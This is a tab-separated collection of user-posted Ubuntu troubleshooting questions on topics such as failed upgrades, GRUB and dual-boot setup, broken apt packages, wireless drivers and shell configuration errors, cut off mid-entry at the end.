425212	major upgrade issue	i upgraded from ubuntu 12 to 13 last night and during that process i was told that something went wrong and a restore or something would happen . well nothing happened so i restarted my computer . it booted into 13 just fine but neither my keyboard nor mouse are working . i have no access to the system . this is a single boot system so i have a completely unusable computer right now . how can i repair the installation ?
425213	filter pam_yubico.so debug stdout	i want to use the yubico-pam module ( https : //github.com/yubico/yubico-pam ) to enable challenge-response authentification using my yubikey when sudoing . i 've managed to do that by adding the line auth required pam_yubico.so mode=challenge-response debug to the file /etc/pam.d/sudo . however doing so give me a whole bunch of output when sudoing : [ pam_yubico.c : parse_cfg ( 761 ) ] called . [ pam_yubico.c : parse_cfg ( 762 ) ] flags 32768 argc 5 [ pam_yubico.c : parse_cfg ( 764 ) ] argv [ 0 ] =mode=challenge-response [ pam_yubico.c : parse_cfg ( 764 ) ] argv [ 1 ] =debug [ pam_yubico.c : parse_cfg ( 765 ) ] ... [ pam_yubico.c : parse_cfg ( 766 ) ] ... [ pam_yubico.c : parse_cfg ( 767 ) ] ... [ pam_yubico.c : parse_cfg ( 768 ) ] ... [ pam_yubico.c : parse_cfg ( 769 ) ] ... [ pam_yubico.c : parse_cfg ( 770 ) ] ... [ pam_yubico.c : parse_cfg ( 771 ) ] ... [ pam_yubico.c : parse_cfg ( 772 ) ] ... [ pam_yubico.c : parse_cfg ( 773 ) ] ... [ pam_yubico.c : parse_cfg ( 774 ) ] ... [ pam_yubico.c : parse_cfg ( 775 ) ] ... [ pam_yubico.c : parse_cfg ( 776 ) ] ... [ pam_yubico.c : parse_cfg ( 777 ) ] ... [ pam_yubico.c : parse_cfg ( 778 ) ] ... [ pam_yubico.c : parse_cfg ( 779 ) ] ... [ pam_yubico.c : parse_cfg ( 780 ) ] ... [ pam_yubico.c : parse_cfg ( 781 ) ] ... [ pam_yubico.c : parse_cfg ( 782 ) ] ... [ pam_yubico.c : parse_cfg ( 783 ) ] ... [ pam_yubico.c : pam_sm_authenticate ( 823 ) ] get user returned : ... [ pam_yubico.c : do_challenge_response ( 505 ) ] loading challenge from file ... [ util.c : load_chalresp_state ( 269 ) ] ... [ pam_yubico.c : do_challenge_response ( 583 ) ] got the expected response , generating new challenge ( 63 bytes ) . [ pam_yubico.c : do_challenge_response ( 663 ) ] challenge-response success ! of which i only want to see the lines containing `` do_challenge_response '' , to get some clear info when the authentication fails ( eg . i forgot to insert my yubikey ... ) . how can i do this ? ( eg . add `` | grep 'do_challenge_response ' '' at the end of the line i added in /etc/pam.d/sudo , but that does n't work )
425214	windows 7 not listed on the ubuntu 13.10 grub menu	background info : i have two hard drives ( hdd1 : solid state with windows 7 ; hdd2 : normal hard drive with ubuntu 13.10 ) . ubuntu loads currently going to the grub2 menu . i would like to load my computer on the solid state drive for speed reasons ( obviously ) . i have access only to ubuntu os at the moment . my bios shows , hhd2 as the primary drive , but after changing it to hdd1 , it went to a command line interface with it pointing to grub rescue > for the ubuntu drive , i have partitioned it appropriately with a /boot /root /home and swap problem : i have searched high and low through the internet . my computer currently boots using grub2 after preforming the boot repair tool . windows 7 is n't in the list but to be honest i would rather have windows do the loading through the solid state drive . if i have researched correctly , it is possible to add a grub or something on the windows drive and have that load the os .
425216	uninstalled xubuntu desktop - now no login screen ?	i installed xubuntu desktop environment but did n't like it . i found a thread which listed a large command to uninstall everything . now when my machine boots , i get a black screen and no possibility of logging in . how do i fix this ? i do n't particularly want to have to reinstall ubuntu . the command i entered to uninstall it was this : sudo apt-get remove abiword abiword-common abiword-plugin-grammar abiword-plugin-mathview alacarte bison blueman brltty-x11 catfish espeak exo-utils flex fonts-droid fonts-lyx gigolo gmusicbrowser gnome-system-tools gnome-time-admin gstreamer0.10-gnomevfs gthumb gthumb-data gtk2-engines-pixbuf indicator-application-gtk2 indicator-sound-gtk2 leafpad libabiword-3.0 libbison-dev libdigest-crc-perl libexo-1-0 libexo-common libexo-helpers libfl-dev libgarcon-1-0 libgarcon-common libgdome2-0 libgdome2-cpp-smart0c2a libglade2-0 libgnomevfs2-0 libgnomevfs2-common libgnomevfs2-extra libgsf-1-114 libgsf-1-common libgstreamer-perl libgtk2-notify-perl libgtk2-trayicon-perl libgtkmathview0c2a libgtkspell0 libido-0.1-0 libindicate-gtk3 libintl-perl libjpeg-progs libjpeg-turbo-progs libkeybinder0 liblink-grammar4 libloudmouth1-0 libnet-dbus-perl liboobs-1-5 libotr2 libots0 librarian0 libsexy2 libtagc0 libthunarx-2-0 libtidy-0.99-0 libtie-ixhash-perl libtumbler-1-0 libunique-1.0-0 libvte-common libvte9 libwv-1.2-4 libxfce4ui-1-0 libxfce4ui-utils libxfce4util-bin libxfce4util-common libxfce4util6 libxfcegui4-4 libxfconf-0-2 libxml-parser-perl libxml-twig-perl libxml-xpath-perl lightdm-gtk-greeter link-grammar-dictionaries-en m4 orage parole pastebinit pavucontrol pidgin pidgin-data pidgin-libnotify pidgin-microblog pidgin-otr plymouth-theme-xubuntu-logo plymouth-theme-xubuntu-text python-configobj rarian-compat ristretto screensaver-default-images scrollkeeper shimmer-themes system-tools-backends tcl8.5 thunar thunar-archive-plugin thunar-data thunar-media-tags-plugin thunar-volman tumbler tumbler-common xbrlapi xchat xchat-common xfburn xfce-keyboard-shortcuts xfce4-appfinder xfce4-cpugraph-plugin xfce4-dict xfce4-indicator-plugin xfce4-mailwatch-plugin xfce4-netload-plugin xfce4-notes xfce4-notes-plugin xfce4-notifyd xfce4-panel xfce4-places-plugin xfce4-power-manager xfce4-power-manager-data xfce4-quicklauncher-plugin xfce4-screenshooter xfce4-session xfce4-settings xfce4-systemload-plugin xfce4-taskmanager xfce4-terminal xfce4-verve-plugin xfce4-volumed xfce4-weather-plugin xfce4-xkb-plugin xfconf xfdesktop4 xfdesktop4-data xfwm4 xscreensaver xscreensaver-data xscreensaver-gl xubuntu-artwork xubuntu-default-settings xubuntu-desktop xubuntu-docs xubuntu-icon-theme xubuntu-wallpapers & & sudo apt-get install ubuntu-desktop
425218	unable to delete files and stop sharing	i actually ca n't delete files from my one.ubuntu-account and also i ca n't stop sharing files . is there a problem with the ubuntu-one-website ?
425219	running a daemon process from upstart	i 'm running my application on a vps under ubuntu 12.04 lts . and i have a problem with one daemon process for one of my applications . this process is called `` delayed_job '' ( if not familiar - this is just a background task handler ) . the problem with this process is that sometimes it gets killed ( i suppose it is because i have limited amount of ram on my server - only 1gb ) . but the main problem with this thing is that it is not capable of booting again after a crash or `` kill '' signal , unlike `` unicorn '' ( it is a rails app server ) processes , which are always getting re-booted no matter what happens to them . and yes , this is a very big deal , because a lot of application features are using background tasks . same story happens when there are maintenance works on the vps ( initiated by the owner of the vps ) and after the restart the `` delayed_job '' process is not present in the system anymore . this is the command i run every single time to boot it up : rails_env=production script/delayed_job start it is a well-known problem , but the only solution i found on the internet is this article : http : //www.alexreisner.com/code/upstart that suggests using linux 's `` upstart '' feature with the `` respawn '' option that is capable of re-booting the process if it gets killed or crashed . even though the article is a bit out-dated , i found out that ubuntu 12.04 should support this feature and i 've created a symlink in /etc/init directory ( i 've called it : delayed_job.conf ) to the `` delayed_job '' file that i 'd put in one of my applications folders ( app_name/config , to be exact ) - i 've done everything this article says . my problem is : when i try booting this new process ( start delayed_job ) in the console i get : delayed_job start/running , process 6000 but in fact - no `` delayed_job '' process is getting created at all . and the status ( status delayed_job ) of the initctl process is still : delayed_job stop/waiting after i execute kill -9 6000 i get -bash : kill : ( 6000 ) - no such process so , this means that nothing gets executed . i 've tried running this numerous times under different conditions - nothing , no avail . is simply does not work . is there any thing i could try to make it work , or it is just useless ?
425221	3d acceleration for ubuntu 12.04 on vmware guest ?	i have a virtual machine ubuntu 12.04 on vmware player . i tried to enable unity 3d , to take advantage of compiz . i have updated vmware tools and set the option on the player to enable 3d acceleration . for what i read , it seems sort of a pain to get ubuntu 3d working on a vm and mostly dependent on the hardware . my host machine is running windows 7 with an intel i7 920 cpu and a radeon 5800 graphics card . did anyone find a way to enable 3d acceleration to run ubuntu 3d on wmware player with similar host hardware ?
425226	how to change free space to unallocated ?	i wanted to install ubuntu 13.10 therefore i have shrunk one of my logical partitions ( d : ) , but the new partition instead of unallocated is free space . now if i choose the option to install ubuntu alongside windows 7 ( instead of something else option ) does the installer automatically install in that free space or i should convert it to unallocated ? should i have shrunk a primary partition to use that option ?
425229	chrome and chromium both frequently freezing on a fresh ubuntu gnome 13.10 install	i recently installed ubuntu gnome 13.10 since then i experience a lot of issues both with chromium and google-chrome-stable . at about every 3rd launch i get the message 'could n't log in properly ' . but then it works fine . after some minutes of usage some pages suddenly load very slow ( especially facebook ) and while its loading i can not scroll or do anything in any tab ( although i can switch tabs ) . after some more time it freezes completely and i need to force quit . ( this happens regardless whether the message mentioned before appears or not ) . sometimes also the 'save image as ' wo n't work at all , even after a fresh start . here 's what i 've done so far : multiple remove/install ( using apt-get purge and removing ~/.config/chromium resp . ~/.config/google-chrome disable all add-ons clear cache/cookies launch chrome with logging ( see below ) check memory : theres always about 2 gb of ram left when the freezes occur the gtk-warning appears many times before the crash , so i think it is not the matter . i 'm also confused by the message about the autofill , since i was n't using any site requiring autofill at the time when i logged that crash . i 'd be very glad if anybody could provide me with some ideas how i can further troubleshoot the problem . [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 421 ) ] passwords datatype error was encountered : association timed out . [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 288 ) ] failed to associate models for passwords [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 421 ) ] autofill profiles datatype error was encountered : association timed out . [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 288 ) ] failed to associate models for autofill profiles [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 421 ) ] autofill datatype error was encountered : association timed out . [ 3899:3899:0223/195734 : error : model_association_manager.cc ( 288 ) ] failed to associate models for autofill killed
425230	need to make flash-plugin work with dooble browser version 0.07	i have finally found a browser that works best on my old machine , it is very fast , and also cpu friendly . they named it 'dooble ' , i have no idea why , but i like this browser . i use dooble version 0.07 which comes along with ubuntu 12.04.4 lts repositories . i can easily navigate on the web , read my e-mail , see all images , and even copy youtube video links to watch them in vlc player but i can not make flash-plugin work with dooble no matter what . i have tried to find the default folder for dooble plugins to copy-paste the flash module ( s ) in there but no luck so far . maybe someone can help me with this one ? please do n't send me to dooble official page or tell me to upgrade to latest version because i already done these things and all i can say is that latest dooble release ( v. 1.47 ) is some kind of firefox dressed in sheep clothes meaning it is no good and eats lots of resources like most of the browsers they feature nowadays . this is the dooble.conf file , and maybe someone can help me add an entry for flash module located in /usr/lib/flashplugin-installer/libflashplayer.so . you can find next a link to the above mentioned dooble.config file - http : //i60.tinypic.com/2u7c1ua.png it would be nice to make flash module work with dooble 0.07 , i mean it shows a video loading on youtube ( and youtube only ) , but there is no video playing , just the loading screen , like in the following image , on other video websites it just tells me i must install flush-plugin , and there is no video at all : in the end , i decided for a compromise , and i use dooble for navigating the internet very fast and with very few resources , and mozilla firefox for heavy duty internet tasks .
425231	i am having trouble installing retroarch ?	this website is teaching me how to install retroarch . http : //ubuntuhandbook.org/index.php/2013/11/install-retroarch-emulator-ppa-ubuntu/ i enter the first line in the terminal , the one that installs the ppa . `` add-apt-repository ppa : hunter-kaller/ppa '' and in return , i get this : '' error : must run as root '' i am quite confused . help ?
425232	realtek rtl8723ae adapter disabling entire home network	i recently bought an nspire laptop from novatech which came with a realtek rtl8723ae wireless adapter . the drivers work fine in 13.10 but after about 10-20 minutes i lose connection to the internet . i am still connected to my router but not the internet . it turns out that every device in the entire house that is connected to the network loses its internet when it happens to me on my laptop . the instant i disconnect from the network on my laptop or shut it down , all of the other devices regain their connection . if i disconnect and reconnect to the network i get my connection back for another 10-20 minutes until the process repeats again . here 's the output of lspci | grep net : 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter and this is ifconfig wlan0 when the internet is working : wlan0 link encap : ethernet hwaddr 24:0a:64 : dd : a5 : f8 inet addr:192.168.0.104 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :260a:64ff : fedd : a5f8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:232021 errors:0 dropped:1 overruns:0 frame:0 tx packets:133878 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:323728915 ( 323.7 mb ) tx bytes:12464930 ( 12.4 mb ) now when it is not : wlan0 link encap : ethernet hwaddr 24:0a:64 : dd : a5 : f8 inet addr:192.168.0.104 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :260a:64ff : fedd : a5f8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:245793 errors:0 dropped:1 overruns:0 frame:0 tx packets:144472 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:337183544 ( 337.1 mb ) tx bytes:15890324 ( 15.8 mb ) here 's iwconfig wlan0 when the internet is working : wlan0 ieee 802.11bgn essid : '' tp-link '' mode : managed frequency:2.437 ghz access point : 64:70:02 : c3:0a : c1 bit rate=150 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=60/70 signal level=-50 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1 missed beacon:0 now when it is not : wlan0 ieee 802.11bgn essid : '' tp-link '' mode : managed frequency:2.437 ghz access point : 64:70:02 : c3:0a : c1 bit rate=150 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=50/70 signal level=-60 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 any help would be really appreciated and i 'd be happy to post any other necessary information .
425235	how can i install teamviewer on xubuntu 13.10 ?	i 'm trying to install teamviewer on xubuntu 13.10 , 64 bit version . there is `` known '' problem with the 64 bit package on their website , hence its advised to install the 32 bit version . ( as explained here : install teamviewer using a 64-bits system but i get a dependency error ) i 've followed all the steps in the above listed answer , but i end up getting the following error , when using gdebi ( or other errors in `` manual mode '' ) : can not install 'libc6 : i386' i 'm trying to use apt-get install on this lib give various errors . how can this be solved ?
425236	wireless network adapter invisible to any system	whatever i do , i can not seem to get access to the wireless adapter . it ia also undetected by iwconfig , and the system settings only show two tabs ( not the wireless one ) . what can i do to solve this ? i know this is not a ubuntu specific question , but maybe you have suggestions on how to solve this .
425237	changing cpu from intel to amd	i currently have two computers using ubuntu , i want to switch the hard drives of the two so the one i use more has more space . my problem is one of my computers has a intel cpu and one has a amd cpu , would i be able to successfully swap hard drives ? both use ddr2 ram and have amd graphics cards ( 6xxx and a 5xxx series card ) thanks !
425239	ubuntu touch desktop/dock mode	i recently installed ubuntu touch dualboot on my nexus 4 . i am considering buying a slimport hdmi adapter and want to know if desktop ( dock ) mode is functional in the latest release of ubuntu touch ( trusty ) for my device ? i 'd love to be able to have a full desktop to carry around with me in my pocket ! please let me know if/when this feature is/will be available ?
425242	how do i fix 'error : root : debfileapplication import ' ?	i keep getting this : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : opera the following packages have been kept back : clipgrab gnome-keyring linux-headers-generic linux-image-generic 0 upgraded , 0 newly installed , 1 to remove and 4 not upgraded . 1 not fully installed or removed . after this operation , 42.7 mb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 731740 files and directories currently installed . ) removing opera ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 47 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 47 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser dpkg : error processing opera ( -- remove ) : subprocess installed post-removal script returned error exit status 1 processing triggers for menu ... errors were encountered while processing : opera e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this ?
425243	dnsmasq configuration for lan	i am going to configure dnsmasq for my local home network but i am not sure if i understand it . basically i have a simple network at home : laptop 192.168.0.10 phone ( galaxy s2 - ubuntu touch with lamp server ) 192.168.0.14 router is 192.168.0.1 . i have installed dnsmasq on my phone where i have a lamp server . my problem is that every time when i create new site on my server i have to add it to my /etc/hosts file on my laptop like that : 192.168.0.10 testingsite.dev basically i would like to have it done by dnsmasq automatically but i do n't know how to set it up for the network . it works locally ( i mean on the phone ) but not for computers which belong to the network . does anyone know how the /etc/dnsmasq.conf file should look like and do i need do something extra ?
425245	chrubuntu not working aside chrome os	i recently installed chrubuntu on my acer c720 . the is one problem thou it wo n't let me boot back into chrome in less i reset and delete ubuntu . it also works the other way round so that when in chrome os ca n't access chrubuntu . some extra details . i am running on 13.04 because 13.10 is really laggy on my chromebook . i only accessed chrome os because i run the command that set defaults at the 5 second at the end of ubuntu installation thanks , billy
425246	where can i find btnx ?	i 'm having trouble finding packages or source for the btnx service , it looks like the ollisalonen.com site that hosted btnx is no longer available . i also can not find any btnx packages in apt or on the ubuntu software center . does anyone know how to get btnx these days ?
425254	hp envy touchsmart 15 notebook pc 15-j063cl	hi i cant access any wireless . i am new to ubuntu 12.04 but this is what i get when i type ifconfig eth0 link encap : ethernet hwaddr a0:48:1c : c6 : b6:60 inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a248:1cff : fec6 : b660/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:81 errors:0 dropped:0 overruns:0 frame:0 tx packets:111 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:28196 ( 28.1 kb ) tx bytes:13905 ( 13.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:70 errors:0 dropped:0 overruns:0 frame:0 tx packets:70 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5895 ( 5.8 kb ) tx bytes:5895 ( 5.8 kb ) any help would be great . thanks in advance
425256	terminal switched name to `` server '' after running `` hdiutil '' command	i downloaded the .iso file from the ubuntu website and i was at step 3 and instead of running the entire command i only ran hdiutil in terminal . my terminal normally said sonnys-macbook-pro : ~ username $ ( but it changed it to ) server : ~ username $ . once this happened i didnt do anything else . i do not know if this changed any core settings on my computer . did it ? also , if i want to change the `` server '' name back to `` sonnys-macbook-pro '' how do i do that ? can i change it to anything i want without it messing up any core settings ? i tried everything but no luck . it almost appears the hdiutil command i ran in terminal started something a script that i can not get out of . any thoughts ?
425259	unmet dependencies when trying to install curl	i have been struggling to fix this problem for 3 hours by now.i have searched for solution on this forum but so far anything that i have tried did n't help . when i try to run the following command : sudo apt-get install curl i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : curl : depends : libcurl3 ( = 7.32.0-1ubuntu1.2 ) but 7.32.0-1ubuntu1.3 is to be installed e : unable to correct problems , you have held broken packages . i would appreciate some help.thank you in advance .
425261	surface pro , install ubuntu on flash drive problem	i have spent a few days and ca n't seem to find a clear answer for this . goal : install ubuntu onto a usb 3 flash drive ( not live/persistent ) for my surface pro without touching any of my surface pro partitions . so when i first attempt to install ubuntu ( 12.04 ) , the installer did not bother asking me where i want to install the bootloader , i assume it automatically wrote over my surface pro efi boot because after i rebooted without the flash drive ( where i installed my ubuntu to ) attached i 'm greeted with `` grub minimal bash like system '' , so it basically could n't find where grub was installed to . i was still able to get into windows through grub when i have my ubuntu usb attached so i can access grub 's windows 8 entry . but this is not want i want . i prefer not to have usb in at all if i want to boot into windows . after hours of searching for a resolution to this , i ended up wiping my surface pro completely because no one seems to be able to explain uefi boot other than the fact it 's `` different than bios '' . after restoring everything , upgrading back to windows 8.1 , i 'm making a second attempt at this and same thing happens when i create my own partitions on the flash drive , it still seems to just overwrite the default bootloader . first question : how can i restore the default bootloader so it would boot directly into windows 8 ? second question : how can i install grub on the flash drive so that whenever i want to boot into ubuntu i would use this workflow : boot to windows - > pc settings - > advanced restart - > reboot from media/usb/cd devices - > boot from my ubuntu usb any help would be greatly appreciated . p.s i tried ubuntu 13.10 livecd and it would not boot on my surface pro .
425264	iphone 4s wo n't mount on my laptop running ubuntu 12.04 ?	my laptop is an acer aspire d257 . i have tried a couple commands but i ca n't get my iphone 4s to mount , it charges and shows up but just wont mount . is there any way to get music into my iphone at all with ubuntu ?
425265	is there an ubuntu desktop icon theme that looks like ubuntu touch icons ?	the question is clear . is there an ubuntu desktop icon theme ( complete or not ) that looks like ubuntu touch icons ? i saw this question , and on trying to install the ubuntu-mobile-icons , i got this error : e : unable to locate package ubuntu-mobile-icons
425267	issue booting 14.04 on macbook air	filed as bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1284085 tracking there . i 'm attempting to install and run 14.04 trusty on a macbook air in a dual boot configuration . i have a mac 64bit iso bootable usb device that i used to install on top of refind . the very first time i installed and setup it worked . i was in ubuntu . i installed updates and some basic packages and when i rebooted it would no longer boot . i had gotten an updated kernel so i attempted to boot to the older -08 kernel with no luck . i then attempted to reinstall . i figured i could avoid updates for the moment . i used the usb stick to do an install using the `` remove 14.04 and install '' option . when it was done , it would not boot just as before . i attempted to use the usb stick to rebuild grub using http : //howtoubuntu.org/how-to-repair-restore-reinstall-grub-2-with-a-ubuntu-live-cd with no luck . i 've tried setting boot params in grub of nomodeset noapic . when i turn off the quiet mode i get the following screenshot where it hangs very early in the boot process around `` booting smp configuration '' . https : //www.dropbox.com/s/behviox991o01o1/2014-02-23 % 2016.15.15.jpg any ideas on how to debug and get the system to boot are appreciated .
425269	keyboard and mouse broken shortly after using stylus	i have an hp 2710p notebook . i am running the latest lts . everything works out of the box aside from the occasional panel crash ; and this problem : whenever i flip the screen back from using the stylus in `` tablet mode '' , the keyboard and mouse are nonfunctional . to remedy this issue i can put the system into and out of standby , or reboot the system ; but it would be nice to not need to do either .
425271	ubuntuone remains paused	running ubuntu 13.10 x64 . ubuntuone worked well until a added a new folder to the mix . i 'm only using 9 % of my storage so the issue is not that . i do however get the same upload message that indicates that it has stopped while indexing the folder .
425272	torrent box , torrentwatch-x setup install help	i 'm trying to set up a ubuntu `` torrent box '' , samba file sharing transmission remote torrentwatchx - and this is where i am stuck , - what i have done so far is sudo apt-get install php-services-json php5-curl php5-cgi cd ~/downloads wget http : // torrentwatch-x.google.code.com ... x-0.8.9.tar.gz -o torrentwatch-x.tar.gz ( -space ) tar xzvf ./torrentwatch-x.tar.gz sudo mv ./torrentwatchx-0.8.9/ /var/www/torrentwatch-x/ sudo cp /var/www/torrentwatch-x/php/config.php.dist /var/www/torrentwatch-x/php/config.php sudo mkdir /etc/torrentwatch - and this i believe installed torrentwatch ? altso installed apache2 that i think is required to get this working sudo apt-get install apache2 edited httpd.conf with sudo nano /etc/apache2/httpd.conf and wrote /var/www/torrentwatch-x/web saved - some searching later i : sudo nano /etc/apache2/conf.d/torrentwatch-x.conf # ensure apache listens on port 9092 listen 9092 # listen for virtual host requests on all ip addresses namevirtualhost *:9092 < directory `` /var/www/torrentwatch-x '' > allowoverride none authtype basic authname `` torrentwatch-x '' authuserfile /etc/torrentwatch/passwords require user admin order allow , deny allow from all < /directory > < virtualhost *:9092 > servername hoth.local documentroot /var/www/torrentwatch-x < /virtualhost > some more searching ended with altso : sudo nano /etc/torrentwatch/torrentwatch.config and entered : [ settings ] episode only = 0 combine feeds = 1 transmission login = transmission password = transmission host = localhost transmission port = 9091 transmission uri = /transmission/rpc watch dir = download dir = /home/torrents/download cache dir = /var/www/torrentwatch-x/rss_cache/ tvdb dir = /var/www/torrentwatch-x/tvdb_cache/ save torrents = run torrentwatch = true client = transmission verify episode = 1 only newer = 1 download proper = default feed all = deep directories = 0 require episode info = 1 hope someone can explain what i 'm doing wrong/ what more i need to do ? - - what i need help with is how to insall torrentwatch-x for a noob - so now i figured i broke everything so i did a clean ubuntu install to start from scrach , if i get a assistance : /
425273	no command is working , edited .bashrc file	i edited .bashrc file with path value , but when i open a new terminal after this , none of command is working . when i am opening a new terminal its giving : bash : export : `/usr/lib/java/jdk1.7.0_51 ' : not a valid identifier bash : export : `=/usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/shilpa/sqllib/bin : /home/shilpa/sqllib/adm : /home/shilpa/sqllib/misc : /home/shilpa/sqllib/db2tss/bin : /bin ' : not a valid identifier bash : export : `/usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/shilpa/sqllib/bin : /home/shilpa/sqllib/adm : /home/shilpa/sqllib/misc : /home/shilpa/sqllib/db2tss/bin : downloads/hadoop-1.2.1/bin ' : not a valid identifier shilpa @ ubuntu : ~ $ ls bash : ls : no such file or directory please help me with this .
425275	download entire web archive using terminal	what i 'm trying to do is download a whole web archive using wget . when i put something like wget ( website link ) using https , it does n't download everything , but when i put a specific file name , it downloads it . is there any way i can have the terminal try every possible combination , each ending in the file type , so that it downloads all the good stuff i need ? apparently , when i do n't be specific , it refuses the connection .
425276	ca n't use wireless internet on 12.04	i have an acer c7 chromebook and i installed ubuntu 12.04 ( chrubuntu as it calls itself ) and the wi-fi is n't working , i looked through the forums and i was not helped , another thing is my wired connection is n't working either , so i have no idea what to do . any ideas ?
425283	sudo apt-get install not working	i was installing chrome using apt-get and after that i 'm not able use command sudo apt-get install or sudo apt-get update anything which i am doing with my package manager is not working , is always showing this error : reading package lists ... error ! e : problem parsing dependency recommends e : error occurred while processing foomatic-filters ( newversion2 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . can you please tell me how to fix this problem ? i am using ubuntu 11.10 . i am not even able to upgrade to ubuntu 12.04 because of this problem .
425287	defrag ntfs partition without messing up ext4 partition	a while back when i had windows and ubuntu on the same hard drive , i defragged from windows and it messed ubuntu up . is there a way so that i can defrag it without touching the ext4 partition ?
425289	keyboard shortcuts not working in gnome 3.10	i am not a fun of unity so i decided to install gnome 3 on my pc which is running ubuntu 13.10. but after the installation , i am failing to use some shortcuts like ctrl+alt+t to open termiinal and others for volume . would someone help me please .
425292	accidentally stopped sync ubuntu one	i just did a complete recovery of my pc and lost all my data . i have backed up the most important ones in a folder in ubuntu one . now , i accidentally hit the `` unsync '' on the folder online and now everything is gone ! : ( is there any way of getting it back , or have i really screwed up this time ? it says on the online page that i have 0 folders and files in sync ... running ubuntu 12.04 .
425294	how to uninstall garena plus from ubuntu 12.04	ok guys so i downloaded and installed garena plus with wine but something was n't working so now i want to uninstall it . i 'm new on linux and it 's hard for me to figure out where the application is installed . please help me
425295	terminator - bash character encoding - problem visualizing content of some files	i 'm using terminator to manage several bash shells . if i print the content of some files , some characters are bad displayed . even if the character encoding is setted to utf-8 . below there is the screenshot that shows how the content of a file is bad displayed .
425296	how do i unmount my phone	i am confused . do i need to mount a new sd card or phone or usb stick or external hdd drive every time i plug it in ? and i can not see them if i accidentally close them . i do not know how to eject them . i am forced to just unplug
425298	ca n't change permissions on extracted files ubuntu 13.10	i 'm trying to install a program from the *.x86_64 file but it seems i do n't have the right permissions to do it . even if i right-click and go in the `` permission '' tab , when i try to change anything ( either any of the drop down menus or the `` execute '' check box ) it just change right back to the previous state ( unchecked ) . when i try to : gksu nautilus to change the permission under superuser , it just crash : nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** error : nautilus-properties-window.c:1837 : schedule_owner_change_timeout : assertion failed : ( nautilus_is_file ( file ) ) then i tryed to change permissions and ownership of the folder using different ways : sudo chmod -x *.x86_64 or chmod -r 777 ( folder ) nothing changes . when i use on the folder i get : ls -l drwx -- -- -- 1 psyc0p4th psyc0p4th 4096 jan 29 06:38 ( folder ) when i try it inside the folder ( where the files are ) , i get : -rw -- -- -- - 1 psyc0p4th psyc0p4th 83827576 jan 29 06:37 sounds.dat on every single files . those files come from a downloaded tar.gz . the tar also have the same problem . i tried to decompress using different program ( xarchiver , p7zip , the tar command line ) and i have the same result . the only thing different is that in 